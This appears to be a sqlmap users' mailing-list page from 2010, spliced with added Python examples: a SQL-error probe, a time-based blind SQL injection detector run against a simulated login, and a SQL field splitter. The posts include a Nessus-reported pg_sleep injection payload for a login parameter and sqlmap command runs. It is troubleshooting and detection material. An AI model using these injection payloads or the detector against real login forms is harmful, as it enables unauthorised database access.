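    def log_message(self, *args):           # keep the demo quiet
        pass


def start_server():
    """Start the stand-in on a free loopback port; returns the server."""
    srv = HTTPServer(("127.0.0.1", 0), _Redirector)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


# Error signatures worth grepping for in the raw body of the FIRST response.
DB_ERROR_PATTERNS = [
    re.compile(r"Microsoft OLE DB Provider for SQL Server error '80040e14'"),
    re.compile(r"Unclosed quotation mark after the character string"),
]


def fetch_no_follow(host, port, path):
    """One GET, returning (status, Location, body). http.client never
    follows redirects, so a 302 comes back as-is for inspection."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location"), resp.read().decode("latin-1")
    finally:
        conn.close()


def with_trailing_quote(path, param):
    """Rebuild `path` with a single quote appended to `param`'s value."""
    parsed = urlparse(path)
    qs = parse_qs(parsed.query, keep_blank_values=True)
    qs[param] = [qs.get(param, [""])[0] + "'"]
    return parsed.path + "?" + urlencode({k: v[0] for k, v in qs.items()})


def probe_redirector(host, port, path, param):
    """Compare the untouched request with the quote-injected one and report
    whether the injected response body carries a recognisable DB error."""
    base_status, base_loc, _ = fetch_no_follow(host, port, path)
    inj_status, _, inj_body = fetch_no_follow(host, port, with_trailing_quote(path, param))
    return {
        "baseline_status": base_status,
        "baseline_redirect": base_loc,
        "injected_status": inj_status,
        "db_error": any(p.search(inj_body) for p in DB_ERROR_PATTERNS),
    }


if __name__ == "__main__":
    server = start_server()
    print(probe_redirector("127.0.0.1", server.server_address[1],
                           "/redirect.asp?sid=7321", "sid"))
    server.shutdown()
```

The baseline 302 is recorded rather than followed, so a redirect to an unreachable or censored host cannot turn into a spurious "page not found"; only the injected request is judged, and only by what its own body says.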
From: David G. <sk...@gm...> - 2010-04-05 20:38:45
|
I have one site in Java which is only vulnerable to this type of technique (time-based blind SQL injection), where all others simply do not work.

Theoretically speaking, I have a login form that receives 2 parameters from the user via the POST method, which are the login and password. I've tried several ways to circumvent this form to gain unauthorized access, but I had no success exploiting the SQL injection. However, Nessus reported that the field is vulnerable to time-based SQL injection by manipulating the parameter j_username with the following query:

j_username = ';%20select%20pg_sleep%20(10)--

Having tested the flaw, I noticed that you can only make a time-based blind SQL injection. But even passing the --time-test parameter to sqlmap, and setting the timetest option in sqlmap.conf to true, does not make sqlmap test for time-based SQL injection.

# ./sqlmap.py -u "http:/xxxx/xxxx/j_xx_xxx" --data "action=Login&j_password=&j_username=" -p j_username -v 2 --time-test --time-sec 4 --dbms postgresql

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 17:34:40

[17:34:40] [DEBUG] initializing the configuration
[17:34:40] [DEBUG] initializing the knowledge base
[17:34:40] [DEBUG] cleaning up configuration parameters
[17:34:40] [DEBUG] setting the HTTP timeout
[17:34:40] [DEBUG] setting the HTTP method to GET
[17:34:40] [DEBUG] creating HTTP requests opener object
[17:34:40] [DEBUG] forcing back-end DBMS to user defined value
[17:34:40] [DEBUG] parsing XML queries file
[17:34:40] [INFO] using '/home/skys/sqlmap-dev/output/xxx/session' as session file
[17:34:40] [INFO] testing connection to the target url
sqlmap got a 302 redirect to http://xxx/xxx/index.html;jsessionid=8EF344E0CF2864CF8DCDF23F730E0F57 - What target address do you want to use from now on? http://xxx:80/xxx/j_xxx_xxx(default) or provide another target address based also on the redirection got from the application >
[17:34:41] [WARNING] the testable parameter 'j_username' you provided is not into the Cookie
[17:34:41] [INFO] testing if the url is stable, wait a few seconds
[17:34:42] [INFO] url is stable
[17:34:42] [INFO] testing sql injection on POST parameter 'j_username' with 0 parenthesis
[17:34:42] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:42] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:42] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:42] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:42] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:42] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 0 parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 1 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 1 parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 2 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 2 parenthesis
[17:34:43] [INFO] testing sql injection on POST parameter 'j_username' with 3 parenthesis
[17:34:43] [INFO] testing unescaped numeric injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not unescaped numeric injectable
[17:34:43] [INFO] testing single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not single quoted string injectable
[17:34:43] [INFO] testing LIKE single quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE single quoted string injectable
[17:34:43] [INFO] testing double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not double quoted string injectable
[17:34:43] [INFO] testing LIKE double quoted string injection on POST parameter 'j_username'
[17:34:43] [INFO] POST parameter 'j_username' is not LIKE double quoted string injectable
[17:34:43] [INFO] POST parameter 'j_username' is not injectable with 3 parenthesis
[17:34:43] [WARNING] POST parameter 'j_username' is not injectable
[17:34:43] [ERROR] all parameters are not injectable

[*] shutting down at: 17:34:43

# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1536
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 1536
Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010)

--
David Gomes Guimarães |
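Every test in the run above is boolean or error based, which is why a parameter that only reacts to pg_sleep() comes out "not injectable". What a time-based check has to do instead is compare response times, and do so in a way that a slow or jittery server cannot fake. The following is an added example (not sqlmap's code and not David's) of that check. The login handler is a constructed stand-in for the Java form in the post (an assumption: it ignores the credentials and, like a PostgreSQL backend accepting the stacked query Nessus reported, pauses for pg_sleep(N) seconds when j_username carries one). The detector times a baseline, a pg_sleep(0) control with the same query shape, and the delayed payload, and only reports the parameter injectable when every delayed sample clears the slowest non-delayed one by a margin.

```python
import re
import statistics
import time
from urllib.parse import unquote

# The payload Nessus reported, decoded from the URL-encoded form in the post.
NESSUS_PAYLOAD = unquote("';%20select%20pg_sleep%20(10)--")

# Constructed stand-in for the Java login form in the post (assumption: not
# the real application). It ignores the credentials but, like a PostgreSQL
# backend that accepts the stacked query, pauses for pg_sleep(N) seconds
# when the j_username value carries one, then redirects as the real one did.
_SLEEP_RE = re.compile(r"pg_sleep\s*\(\s*(\d+(?:\.\d+)?)\s*\)", re.IGNORECASE)


def simulated_login(j_username, j_password=""):
    m = _SLEEP_RE.search(j_username)
    if m:
        time.sleep(float(m.group(1)))
    return 302


def timed(send, value):
    """Wall-clock seconds one request with `value` takes."""
    t0 = time.perf_counter()
    send(value)
    return time.perf_counter() - t0


def is_time_injectable(send, base_value, delay, samples=3, slack=0.5):
    """Decide whether the parameter behind `send` is time-based blind injectable.

    Three series are timed: the untouched value (baseline), the same
    stacked payload with pg_sleep(0) (control: identical query shape, no
    delay) and the payload with pg_sleep(delay). The verdict is positive
    only if every delayed sample beats the slowest baseline/control sample
    by at least slack*delay, which keeps a merely slow or jittery server
    from being reported as injectable.
    """
    control_value = base_value + "'; select pg_sleep(0)--"
    delayed_value = base_value + "'; select pg_sleep(%s)--" % delay
    baseline = [timed(send, base_value) for _ in range(samples)]
    control = [timed(send, control_value) for _ in range(samples)]
    delayed = [timed(send, delayed_value) for _ in range(samples)]
    floor = max(baseline + control) + slack * delay
    return {
        "injectable": all(t >= floor for t in delayed),
        "baseline_median": statistics.median(baseline),
        "control_median": statistics.median(control),
        "delayed_median": statistics.median(delayed),
        "threshold": floor,
    }


if __name__ == "__main__":
    print(is_time_injectable(simulated_login, "admin", delay=1))
```

Against a real target `send` would be a function that POSTs the form and returns after the response arrives; the pg_sleep(0) control matters there because it separates "the stacked query runs" from "the server is just slow today".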
From: David G. <sk...@gm...> - 2010-04-05 19:53:29
|
The problem happens with any DBMS I pass. Oracle, MySQL, Postgre, etc.

# ./sqlmap.py -u "http://xxx" --data "xxx" -p xxx -v 2 --time-test --dbms oracle

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 16:49:25

[16:49:25] [DEBUG] initializing the configuration
[16:49:25] [DEBUG] initializing the knowledge base
[16:49:25] [DEBUG] cleaning up configuration parameters
[16:49:25] [DEBUG] setting the HTTP timeout
[16:49:25] [DEBUG] setting the HTTP method to GET
[16:49:25] [DEBUG] creating HTTP requests opener object
[16:49:25] [DEBUG] forcing back-end DBMS to user defined value

[16:49:25] [ERROR] unhandled exception in sqlmap/0.9-dev, please copy the command line and the following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible:
sqlmap version: 0.9-dev
Python version: 2.5.2
Operating system: linux2
Traceback (most recent call last):
  File "./sqlmap.py", line 77, in main
    init(cmdLineOptions)
  File "/home/skys/sqlmap-dev/lib/core/option.py", line 1074, in init
    __setDBMS()
  File "/home/skys/sqlmap-dev/lib/core/option.py", line 503, in __setDBMS
    "|".join([alias for alias in FIREBIRD_ALIASES]))
TypeError: not all arguments converted during string formatting

[*] shutting down at: 16:49:25

# svn info
Path: .
URL: https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Repository Root: https://svn.sqlmap.org/sqlmap
Repository UUID: 7eb2e9d7-d917-0410-b3c8-b11144ad09fb
Revision: 1536
Node Kind: directory
Schedule: normal
Last Changed Author: stamparm
Last Changed Rev: 1536
Last Changed Date: 2010-04-04 11:38:48 -0300 (Sun, 04 Apr 2010)

--
David Gomes Guimarães |
From: Miroslav S. <mir...@gm...> - 2010-04-05 11:33:55
|
Fixed and committed.

On Fri, Apr 2, 2010 at 6:16 PM, Ole Rasmussen <ol...@gm...> wrote:
> I believe there's a bug when executing the following via sql-shell:
> "SELECT REPLACE('something', 's', 'b')"
> The result is:
> [INFO] the SQL query provided has more than a field. sqlmap will now
> unpack it into distinct queries to be able to retrieve the output even if we are
> going blind
>
> and then it returns nothing. This is clearly incorrect - looks like
> sqlmap thinks it's a list of fields.
>

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B |
From: Miroslav S. <mir...@gm...> - 2010-04-04 14:40:04
|
Hi Kasper.

Thank you for spotting and reporting the bug. Now it should be fixed and committed.

Kind regards,
Miroslav Stampar

On Sun, Apr 4, 2010 at 10:11 AM, Kasper Føns <th...@ma...> wrote:
> Hello Sqlmap.
>
> It seems that when using sqlmap with the -g option, sqlmap wants to
> collect cookie parameters.
> The problem is that when switching from one target to another, any
> previous cookie parameters are still kept - though invalid for the new
> target.
>
> /Kasper
>

--
Miroslav Stampar
E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B |
From: Kasper F. <th...@ma...> - 2010-04-04 08:11:45
|
Hello Sqlmap.

It seems that when using sqlmap with the -g option, sqlmap wants to collect cookie parameters.
The problem is that when switching from one target to another, any previous cookie parameters are still kept - though invalid for the new target.

/Kasper |
From: Ole R. <ol...@gm...> - 2010-04-02 16:16:47
|
I believe there's a bug when executing the following via sql-shell:
"SELECT REPLACE('something', 's', 'b')"
The result is:
[INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind

and then it returns nothing. This is clearly incorrect - looks like sqlmap thinks it's a list of fields. |
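The symptom in this report (and in the "fixed and committed" reply earlier on the page) is what happens when a field list is split on every comma: REPLACE('something', 's', 'b') becomes three "fields", and each fragment is then retrieved as a query of its own and fails. The splitter below is an added example, not sqlmap's code or its actual fix; it assumes a simplified SQL grammar (parentheses for nesting, single or double quoted literals with the doubled-quote escape) and splits on top-level commas only, stopping at the first top-level FROM so a subquery's FROM is not mistaken for the outer one.

```python
def _scan(sql):
    """Yield (index, char, depth, in_string) for every character of `sql`,
    tracking parenthesis nesting and '...'/"..." literals (a doubled quote
    inside a literal is an escape, not a terminator)."""
    depth, quote, i, n = 0, None, 0, len(sql)
    while i < n:
        ch = sql[i]
        if quote:
            if ch == quote and sql[i + 1:i + 2] == quote:   # '' or "" escape
                yield i, ch, depth, True
                i += 1
                yield i, ch, depth, True
            elif ch == quote:
                quote = None
                yield i, ch, depth, True
            else:
                yield i, ch, depth, True
        elif ch in ("'", '"'):
            quote = ch
            yield i, ch, depth, True
        elif ch == "(":
            depth += 1
            yield i, ch, depth, False
        elif ch == ")":
            yield i, ch, depth, False
            depth = max(depth - 1, 0)
        else:
            yield i, ch, depth, False
        i += 1


def split_select_fields(field_list):
    """Split a SELECT column list on top-level commas only, so that
    REPLACE('something', 's', 'b') is one field, not three."""
    fields, start = [], 0
    for i, ch, depth, in_string in _scan(field_list):
        if ch == "," and depth == 0 and not in_string:
            fields.append(field_list[start:i].strip())
            start = i + 1
    tail = field_list[start:].strip()
    if tail:
        fields.append(tail)
    return fields


def select_fields(query):
    """Return the fields of a SELECT statement, stopping at the first
    top-level FROM (a subquery's FROM sits at depth >= 1 and is ignored)."""
    q = query.strip()
    if q[:6].upper() != "SELECT" or not q[6:7].isspace():
        raise ValueError("not a SELECT statement")
    body = q[6:]
    upper = body.upper()
    end = len(body)
    for i, ch, depth, in_string in _scan(body):
        if (depth == 0 and not in_string and upper.startswith("FROM", i)
                and body[i - 1].isspace()
                and (i + 4 == len(body) or body[i + 4].isspace())):
            end = i
            break
    return split_select_fields(body[:end])


if __name__ == "__main__":
    print(select_fields("SELECT REPLACE('something', 's', 'b')"))
    print(select_fields("SELECT id, (SELECT COUNT(*) FROM t2), name FROM t1"))
```

A naive `query.split(",")` gives three pieces for the query in the report; the depth/quote-aware scan gives one, and the unpack-into-distinct-queries path is never taken.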